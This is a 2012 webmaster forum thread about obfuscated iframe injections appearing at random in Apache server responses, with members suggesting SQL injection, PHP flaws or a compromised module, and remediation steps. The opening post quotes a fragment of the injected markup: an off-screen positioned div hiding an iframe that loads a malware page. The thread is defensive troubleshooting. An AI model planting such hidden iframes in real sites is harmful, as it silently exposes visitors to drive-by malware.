Welcome to WebmasterWorld Guest from 54.159.51.118

Forum Moderators: Ocean10000 & phranque

Message Too Old, No Replies

iFrame Injections on Server

     
12:05 pm on Aug 15, 2012 (gmt 0)

Full Member

10+ Year Member

joined:May 3, 2004
posts:302
votes: 0


We had a server that showed this type of obfuscated iFrame injection:
<style>.ncy8eh4 { position:absolute; left:-1228px; top:-1108px} </style> <div class="ndicy73jk"><iframe src="http://malware host/325364773.html


The injected code would change constantly with different URLs.

The iFrame wouldn't always show up, but it affected every site on the server and could affect any page - even a test text page like test.html.

Logs show no signs of unauthorized entry, passwords are secure, Apache is 2.2.21.

Since this got into the whole server, we're suspecting something with Apache, but can't figure out how it could be compromised in this manner.

It looks like others have had a similar problem. A breakdown is in detail here:
[blog.unmaskparasites.com ]

Some of the key points from the article:
We should be actually talking about infected server responses since the malicious code cannot be found in any website files.

It is pretty hard to detect this infection since only random server responses are affected.

If you check Apache logs, you can recognize tempered responses since their sizes are slightly bigger than typical response sizes for the same pages.


Any idea how this could happen or how to get rid of it?
2:07 pm on Aug 15, 2012 (gmt 0)

Senior Member

WebmasterWorld Senior Member wilderness is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Nov 11, 2001
posts:5496
votes: 3


Thread title

iFrame Injections on Server


Any idea how this could happen or how to get rid of it?


Sql Injections, PHP vulnerabilities and/or use of 3rd party PHP add-ons, Perl scripts and/or use of 3rd party Perl (same vulnerabiites) scripts.

I don't recall seeing any references within this forum which stated that Apache offered a capability to write either html or CSS.
4:42 pm on Aug 15, 2012 (gmt 0)

Full Member

10+ Year Member

joined:May 3, 2004
posts:302
votes: 0


Thanks for the response. I realize this might not be an Apache issue, but since it seems to be happening at the root level and is affecting other Apache sites, I thought this was the appropriate forum.
4:46 pm on Aug 15, 2012 (gmt 0)

Senior Member

WebmasterWorld Senior Member wilderness is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Nov 11, 2001
posts:5496
votes: 3


SQL injections [google.com]
1:44 am on Aug 16, 2012 (gmt 0)

System Operator from US 

incredibill is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Jan 25, 2005
posts:14664
votes: 99


If you think the entire server is infected, which I've seen with this type of hack, I'd suggest migrating to a clean server and upgrade/update ALL your installed CGI/PHP/etc. software to make sure it's all current and change ALL your passwords.

FWIW, if you're using a control panel like Plesk they've had a couple of vulnerabilities lately and the micro-updates appeared to patch mine, but some needed to apply it manually so that could be another source of infiltration.
6:18 pm on Aug 16, 2012 (gmt 0)

Full Member

10+ Year Member

joined:May 3, 2004
posts:302
votes: 0


Thanks Bill.

This is a really tricky piece of malware. It gets injected into any page with a
</script>
tag, and it comes and goes, making it very hard to trace.

The destination URL (iframe src=) changes simultaneously on several infected sites, which we learned at unmaskparasites.

There are no signs of hacked files or rogue scripts, and the CMS is all custom.

At this point, our best guess is a compromised Apache module or PHP binary.
6:29 pm on Aug 16, 2012 (gmt 0)

System Operator from US 

incredibill is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Jan 25, 2005
posts:14664
votes: 99


the CMS is all custom


Which means if the inputs aren't sanitized and you're using SQL then it's possibly wide open for SQL injection and anything is possible from there, but that's just speculation obviously.